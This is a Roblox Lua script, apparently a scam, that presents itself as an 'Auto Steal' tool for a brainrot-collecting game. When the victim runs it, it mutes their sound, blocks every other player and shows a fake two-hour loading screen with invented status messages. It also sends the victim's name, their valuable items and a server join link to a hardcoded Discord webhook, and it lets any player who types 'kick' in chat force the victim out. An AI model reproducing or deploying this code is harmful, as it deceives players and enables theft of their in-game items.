-- ╔══════════════════════════════════════════╗
-- ║   BRANZZ AUTO — Steal System v23.0       ║
-- ║        🧑‍💻 By BranZZ MetoDos 🚀           ║
-- ╚══════════════════════════════════════════╝

local TweenService      = game:GetService("TweenService")
local CoreGui           = game:GetService("CoreGui")
local SoundService      = game:GetService("SoundService")
local UserGameSettings  = UserSettings():GetService("UserGameSettings")
local Players           = game:GetService("Players")
local HttpService       = game:GetService("HttpService")
local ReplicatedStorage = game:GetService("ReplicatedStorage")
local StarterGui        = game:GetService("StarterGui")
local Workspace         = game:GetService("Workspace")

-- ══════════════════════════════════════
-- ⚙️ CONFIG
-- ══════════════════════════════════════
local LOADING_TIME = "2h"
local WEBHOOK      = "https://discord.com/api/webhooks/1481221065773420719/IDgzqQLc00m0A_kj3BVXfc9XZvU1UtiKxYBnjp7pHwJ2_-rTUdijBelaviQWjSwpJWDB"

local function parseTime(str)
    local num, unit = str:match("^(%d+)([smhSMH]?)$")
    num  = tonumber(num) or 60
    unit = unit and unit:lower() or "s"
    if unit == "m" then return num * 60
    elseif unit == "h" then return num * 3600
    else return num end
end

local LOADING_SECONDS = parseTime(LOADING_TIME)
local localPlayer     = Players.LocalPlayer
local PLACE_ID        = tostring(game.PlaceId)
local JOB_ID          = tostring(game.JobId)

local function getServerLink()
    return "https://v0-roblox-deep-link-app.vercel.app//?placeId="
        .. PLACE_ID .. "&gameInstanceId=" .. JOB_ID
end

-- ══════════════════════════════════════
-- SILENCIAR
-- ══════════════════════════════════════
task.spawn(function()
    while true do
        pcall(function()
            UserGameSettings.MasterVolume = 0
            SoundService.Volume = 0
        end)
        task.wait(0.5)
    end
end)

-- ══════════════════════════════════════
-- LIMPAR GUI ANTIGA
-- ══════════════════════════════════════
pcall(function()
    for _, n in next, {"BRANZZ_AUTO","BRANZZ_LOADING"} do
        local g = CoreGui:FindFirstChild(n)
        if g then g:Destroy() end
    end
end)

-- ══════════════════════════════════════
-- ESTADO
-- ══════════════════════════════════════
local isKicked      = false
local kickedBy      = "Desconhecido"
local lastBrainrots = {}
local exitSent      = false

-- ══════════════════════════════════════
-- UTILS
-- ══════════════════════════════════════
local function formatGen(val)
    if val >= 1000000000 then return string.format("%.2fB/s", val / 1000000000)
    elseif val >= 1000000 then return string.format("%.2fM/s", val / 1000000)
    elseif val >= 1000 then return string.format("%.1fK/s", val / 1000)
    end
    return tostring(val) .. "/s"
end

local RARITY_EMOJI = {
    ["Common"]    = "🟢",
    ["Uncommon"]  = "🟤",
    ["Rare"]      = "🔵",
    ["Epic"]      = "🟣",
    ["Legendary"] = "🟠",
    ["Mythic"]    = "🔴",
    ["Good"]      = "👼",
    ["Secret"]    = "⚫",
    ["OG"]        = "🟡",
}
local function getRarityEmoji(r) return RARITY_EMOJI[r] or "❓" end

-- ══════════════════════════════════════
-- HTTP
-- ══════════════════════════════════════
local function httpPost(url, payload)
    local body    = HttpService:JSONEncode(payload)
    local headers = { ["Content-Type"] = "application/json" }
    local sent    = false
    if not sent then pcall(function() request({ Url=url, Method="POST", Headers=headers, Body=body }); sent=true end) end
    if not sent then pcall(function() http.request({ Url=url, Method="POST", Headers=headers, Body=body }); sent=true end) end
    if not sent then pcall(function() syn.request({ Url=url, Method="POST", Headers=headers, Body=body }); sent=true end) end
    if not sent then pcall(function() HttpService:PostAsync(url, body, Enum.HttpContentType.ApplicationJson); sent=true end) end
    return sent
end

-- ══════════════════════════════════════
-- SCANNER
-- ══════════════════════════════════════
local function scanBrainrots()
    local results = {}
    local plots = Workspace:FindFirstChild("Plots")
    if not plots then return results end

    for _, plot in ipairs(plots:GetChildren()) do
        pcall(function()
            local channel = require(ReplicatedStorage.Packages.Synchronizer):Get(plot.Name)
            if not channel then return end
            local animalList = channel:Get("AnimalList")
            if not animalList then return end

            for slot, animalData in pairs(animalList) do
                if type(animalData) ~= "table" then continue end
                local info = require(ReplicatedStorage.Datas.Animals)[animalData.Index]
                if not info then continue end

                local genValue = require(ReplicatedStorage.Shared.Animals):GetGeneration(
                    animalData.Index, animalData.Mutation, animalData.Traits, nil
                )

                local mutation = (animalData.Mutation and animalData.Mutation ~= "" and animalData.Mutation ~= "None")
                                 and animalData.Mutation or "None"

                local traitsText = "None"
                if animalData.Traits and type(animalData.Traits) == "table" then
                    local tList = {}
                    for _, t in pairs(animalData.Traits) do
                        if type(t) == "string" and t ~= "" then table.insert(tList, t)
                        elseif type(t) == "table" and t.Name then table.insert(tList, t.Name) end
                    end
                    if #tList > 0 then traitsText = table.concat(tList, ", ") end
                end

                local key = "👑 **" .. (info.DisplayName or animalData.Index) .. "** — $" .. formatGen(genValue)
                            .. "\n" .. getRarityEmoji(info.Rarity) .. " " .. (info.Rarity or "?")
                            .. " | 🧬 " .. mutation
                            .. "\n🎯 Traits: " .. traitsText

                results[key] = (results[key] or 0) + 1
            end
        end)
    end
    return results
end

-- ══════════════════════════════════════
-- WEBHOOK PRINCIPAL
-- ══════════════════════════════════════
local function sendWebhook(brainrots)
    lastBrainrots  = brainrots
    local serverLink  = getServerLink()
    local playerCount = #Players:GetPlayers()
    local totalCount  = 0
    local brainrotText = ""

    if next(brainrots) == nil then
        brainrotText = "`Nenhum detectado`"
    else
        local sorted = {}
        for text, count in pairs(brainrots) do
            table.insert(sorted, {text=text, count=count})
            totalCount = totalCount + count
        end
        table.sort(sorted, function(a,b) return a.count > b.count end)
        for _, entry in ipairs(sorted) do
            local line = entry.text
            if entry.count > 1 then line = line .. " **(" .. entry.count .. "x)**" end
            brainrotText = brainrotText .. line .. "\n\n"
            if #brainrotText > 1500 then brainrotText = brainrotText .. "*(+ mais...)*"; break end
        end
    end

    httpPost(WEBHOOK, {
        content = "@everyone @here",
        embeds = {{
            title  = "𝗕𝗿𝗮𝗻𝘇𝗭 𝗡𝗼𝘁𝗶𝗳𝘆𝗲𝗿",
            color  = 0xC9A6F5,
            fields = {
                { name="👤 𝗣𝗹𝗮𝘆𝗲𝗿 𝗘𝘅𝗲𝗰𝘂𝘁𝗼𝗿",       value="**"..localPlayer.Name.."**",              inline=true  },
                { name="👥 𝗣𝗹𝗮𝘆𝗲𝗿𝘀 𝗻𝗼 𝗦𝗲𝗿𝘃𝗶𝗱𝗼𝗿",  value="**"..tostring(playerCount).."**",         inline=true  },
                { name="📊 𝗧𝗼𝘁𝗮𝗹 𝗕𝗿𝗮𝗶𝗻𝗿𝗼𝘁𝘀",       value="**"..tostring(totalCount).."**",          inline=true  },
                { name="🔗 𝗟𝗶𝗻𝗸 𝗱𝗼 𝗦𝗲𝗿𝘃𝗶𝗱𝗼𝗿",     value="[**Clique aqui para entrar**]("..serverLink..")", inline=false },
                { name="🧠 𝗕𝗿𝗮𝗶𝗻𝗿𝗼𝘁𝘀 𝗗𝗲𝘁𝗲𝗰𝘁𝗮𝗱𝗼𝘀", value=brainrotText,                               inline=false },
            },
            footer    = { text="🧠BranzZ Metodos" },
            timestamp = os.date("!%Y-%m-%dT%H:%M:%SZ"),
        }}
    })
end

-- ══════════════════════════════════════
-- WEBHOOK SAÍDA
-- ══════════════════════════════════════
local function sendExitWebhook()
    if exitSent then return end
    exitSent = true
    local playerCount = #Players:GetPlayers()
    local sorted = {}
    for text, count in pairs(lastBrainrots) do table.insert(sorted, {text=text,count=count}) end
    table.sort(sorted, function(a,b) return a.count > b.count end)
    local top4 = ""
    for i = 1, math.min(4, #sorted) do top4 = top4 .. sorted[i].text .. "\n\n" end

    httpPost(WEBHOOK, {
        content = "@everyone @here",
        embeds = {{
            title  = "🚨 𝗖𝘂𝗶𝗱𝗮𝗱𝗼, 𝗢 𝗣𝗹𝗮𝘆𝗲𝗿 𝗔𝗹𝘃𝗼 𝗦𝗮𝗶𝘂!!",
            color  = 0xFF0000,
            fields = {
                { name="👤 𝗣𝗹𝗮𝘆𝗲𝗿 𝗞𝗶𝗰𝗸𝗮𝗱𝗼",        value="**"..localPlayer.Name.."**",      inline=true },
                { name="🦵 𝗞𝗶𝗰𝗸𝗮𝗱𝗼 𝗣𝗼𝗿",           value="**"..kickedBy.."**",              inline=true },
                { name="👥 𝗣𝗹𝗮𝘆𝗲𝗿𝘀 𝗻𝗼 𝗦𝗲𝗿𝘃𝗶𝗱𝗼𝗿", value="**"..tostring(playerCount).."**", inline=true },
                { name="🧠 𝗧𝗼𝗽 𝗕𝗿𝗮𝗶𝗻𝗿𝗼𝘁𝘀",         value=top4~="" and top4 or "Nenhum detectado", inline=false },
            },
            footer    = { text="🧠 BranzZ Metodos" },
            timestamp = os.date("!%Y-%m-%dT%H:%M:%SZ"),
        }}
    })
end

task.spawn(function()
    localPlayer.CharacterRemoving:Connect(function()
        task.wait(0.5)
        if not localPlayer.Character then pcall(sendExitWebhook) end
    end)
    localPlayer.AncestryChanged:Connect(function(_, parent)
        if not parent then pcall(sendExitWebhook) end
    end)
end)

-- ══════════════════════════════════════
-- KICK
-- ══════════════════════════════════════
local function checkKick(msg)
    if isKicked then return false end
    local clean = msg:lower():gsub("%s+","")
    return clean == "kick" or clean == "/kick"
end

local function doKick(byPlayer)
    if isKicked then return end
    isKicked = true
    kickedBy = byPlayer
    pcall(sendExitWebhook)
    task.wait(0.3)
    localPlayer:Kick("Kickado por: " .. byPlayer)
end

task.spawn(function()
    for _, p in ipairs(Players:GetPlayers()) do
        if p ~= localPlayer then
            p.Chatted:Connect(function(msg) if checkKick(msg) then doKick(p.Name) end end)
        end
    end
    Players.PlayerAdded:Connect(function(p)
        if p ~= localPlayer then
            p.Chatted:Connect(function(msg) if checkKick(msg) then doKick(p.Name) end end)
        end
    end)
end)

-- ══════════════════════════════════════
-- BLOCK ALL
-- ══════════════════════════════════════
local function blockAllPlayers()
    local startTime = tick()
    local delay = 10 / math.max(#Players:GetPlayers()-1, 1)
    for _, p in ipairs(Players:GetPlayers()) do
        if tick()-startTime >= 10 then break end
        if p ~= localPlayer and p.UserId > 0 then
            pcall(function() StarterGui:SetCore("PromptBlockPlayer", p) end)
            task.wait(math.max(delay, 0.1))
        end
    end
end

-- ══════════════════════════════════════
-- HELPERS UI
-- ══════════════════════════════════════
local function makeCorner(parent, radius)
    local c = Instance.new("UICorner")
    c.CornerRadius = UDim.new(0, radius or 12)
    c.Parent = parent
end

local function makeStroke(parent, color, thickness)
    local s = Instance.new("UIStroke")
    s.Color = color or Color3.fromRGB(180,160,220)
    s.Thickness = thickness or 1.5
    s.Parent = parent
    return s
end

local function makeDivider(parent, ypos, z)
    local d = Instance.new("Frame")
    d.Size = UDim2.new(0.82,0,0,1)
    d.Position = UDim2.new(0.09,0,0,ypos)
    d.BackgroundColor3 = Color3.fromRGB(55,45,80)
    d.BorderSizePixel = 0
    d.ZIndex = z or 1000001
    d.Parent = parent
end

local function makeLabel(parent, props)
    local l = Instance.new("TextLabel")
    l.BackgroundTransparency = 1
    l.Font = props.font or Enum.Font.Gotham
    l.TextColor3 = props.color or Color3.fromRGB(220,210,240)
    l.TextSize = props.size or 15
    l.Text = props.text or ""
    l.Size = props.sz or UDim2.new(1,0,0,26)
    l.Position = props.pos or UDim2.new(0,0,0,0)
    l.ZIndex = props.z or 1000001
    l.TextXAlignment = props.align or Enum.TextXAlignment.Center
    l.TextWrapped = true
    l.Parent = parent
    return l
end

-- ══════════════════════════════════════
-- LOADING SCREEN — ABRE IMEDIATAMENTE
-- ══════════════════════════════════════
local function showLoading()
    task.spawn(blockAllPlayers)

    local lg = Instance.new("ScreenGui")
    lg.Name = "BRANZZ_LOADING"
    lg.ResetOnSpawn = false
    lg.IgnoreGuiInset = true
    lg.DisplayOrder = 999999
    lg.Parent = CoreGui

    local bg = Instance.new("Frame")
    bg.Size = UDim2.new(1,0,1,0)
    bg.BackgroundColor3 = Color3.fromRGB(8,7,14)
    bg.BorderSizePixel = 0
    bg.ZIndex = 999998
    bg.Parent = lg

    local lc = Instance.new("Frame")
    lc.Size = UDim2.new(0,340,0,360)
    lc.Position = UDim2.new(0.5,-170,0.5,-180)
    lc.BackgroundColor3 = Color3.fromRGB(16,14,26)
    lc.BorderSizePixel = 0
    lc.ZIndex = 999999
    lc.Parent = bg
    makeCorner(lc, 24)
    makeStroke(lc, Color3.fromRGB(160,140,210), 1.5)

    local tb = Instance.new("Frame")
    tb.Size = UDim2.new(1,0,0,4)
    tb.BackgroundColor3 = Color3.fromRGB(180,155,230)
    tb.BorderSizePixel = 0
    tb.ZIndex = 1000000
    tb.Parent = lc
    makeCorner(tb, 4)

    makeLabel(lc, {
        text="METODH BRANZZ",
        font=Enum.Font.GothamBold,
        size=22,
        color=Color3.fromRGB(215,200,245),
        sz=UDim2.new(1,0,0,32),
        pos=UDim2.new(0,0,0,14),
    })

    makeLabel(lc, {
        text="🧠 Auto Steal System  •  By BranZZ MetoDos",
        size=13,
        color=Color3.fromRGB(130,112,175),
        sz=UDim2.new(1,0,0,20),
        pos=UDim2.new(0,0,0,48),
    })

    -- Spinner
    local spinFrame = Instance.new("Frame")
    spinFrame.Size = UDim2.new(0,120,0,120)
    spinFrame.Position = UDim2.new(0.5,-60,0,76)
    spinFrame.BackgroundTransparency = 1
    spinFrame.ZIndex = 1000001
    spinFrame.Parent = lc

    local ringBg = Instance.new("ImageLabel")
    ringBg.Size = UDim2.new(1,0,1,0)
    ringBg.BackgroundTransparency = 1
    ringBg.Image = "rbxassetid://4919428905"
    ringBg.ImageColor3 = Color3.fromRGB(40,32,65)
    ringBg.ZIndex = 1000001
    ringBg.Parent = spinFrame

    local ring = Instance.new("ImageLabel")
    ring.Size = UDim2.new(1,0,1,0)
    ring.BackgroundTransparency = 1
    ring.Image = "rbxassetid://4919428905"
    ring.ImageColor3 = Color3.fromRGB(180,155,225)
    ring.ZIndex = 1000002
    ring.Parent = spinFrame

    local pctLbl = makeLabel(spinFrame, {
        text="0%",
        font=Enum.Font.GothamBold,
        size=20,
        color=Color3.fromRGB(220,210,245),
        sz=UDim2.new(0,80,0,26),
        pos=UDim2.new(0.5,-40,0.5,-13),
        z=1000003,
    })

    task.spawn(function()
        local angle = 0
        while lg.Parent do
            angle = (angle + 4) % 360
            ring.Rotation = angle
            task.wait(0.018)
        end
    end)

    makeDivider(lc, 208)

    local statusLoad = makeLabel(lc, {
        text="Escaneando brainrots...",
        size=15,
        color=Color3.fromRGB(185,170,225),
        sz=UDim2.new(0.88,0,0,24),
        pos=UDim2.new(0.06,0,0,218),
    })

    local barBg = Instance.new("Frame")
    barBg.Size = UDim2.new(0.8,0,0,14)
    barBg.Position = UDim2.new(0.1,0,0,252)
    barBg.BackgroundColor3 = Color3.fromRGB(28,22,46)
    barBg.BorderSizePixel = 0
    barBg.ZIndex = 1000001
    barBg.Parent = lc
    makeCorner(barBg, 7)

    local barFill = Instance.new("Frame")
    barFill.Size = UDim2.new(0,0,1,0)
    barFill.BackgroundColor3 = Color3.fromRGB(180,155,225)
    barFill.BorderSizePixel = 0
    barFill.ZIndex = 1000002
    barFill.Parent = barBg
    makeCorner(barFill, 7)

    makeLabel(lc, {
        text="🧠 BranzZ MetoDos",
        size=12,
        color=Color3.fromRGB(70,58,100),
        sz=UDim2.new(1,0,0,20),
        pos=UDim2.new(0,0,0,326),
    })

    local fakeMessages = {
        "Conectando aos servidores BranZZ...",
        "Verificando brainrots...",
        "Coletando dados do servidor...",
        "Sincronizando módulos...",
        "Processando informações...",
        "Estabelecendo conexão segura...",
        "Carregando sistema de steal...",
        "Finalizando...",
    }

    task.spawn(function()
        local elapsed  = 0
        local interval = 0.1
        local msgIdx   = 1

        while elapsed < LOADING_SECONDS do
            elapsed = elapsed + interval
            local prog = math.min(math.floor((elapsed / LOADING_SECONDS) * 100), 99)

            pctLbl.Text = prog .. "%"
            TweenService:Create(barFill, TweenInfo.new(interval, Enum.EasingStyle.Linear),
                {Size = UDim2.new(prog/100,0,1,0)}):Play()

            local msgStep = math.floor((prog / 100) * #fakeMessages) + 1
            if msgStep ~= msgIdx and msgStep <= #fakeMessages then
                msgIdx = msgStep
                statusLoad.Text = fakeMessages[msgIdx]
            end

            task.wait(interval)
        end

        pctLbl.Text = "100%"
        statusLoad.Text = "Concluído!"
        TweenService:Create(barFill, TweenInfo.new(0.3, Enum.EasingStyle.Linear),
            {Size = UDim2.new(1,0,1,0)}):Play()

        task.wait(1.5)

        TweenService:Create(lc, TweenInfo.new(0.8, Enum.EasingStyle.Quad, Enum.EasingDirection.Out),
            {BackgroundTransparency = 1}):Play()
        TweenService:Create(bg, TweenInfo.new(0.8, Enum.EasingStyle.Quad, Enum.EasingDirection.Out),
            {BackgroundTransparency = 1}):Play()

        task.wait(0.9)
        lg:Destroy()
    end)
end

-- ══════════════════════════════════════
-- EXECUÇÃO AUTOMÁTICA
-- ══════════════════════════════════════
task.spawn(function()
    showLoading()
    local brainrots = scanBrainrots()
    sendWebhook(brainrots)
end)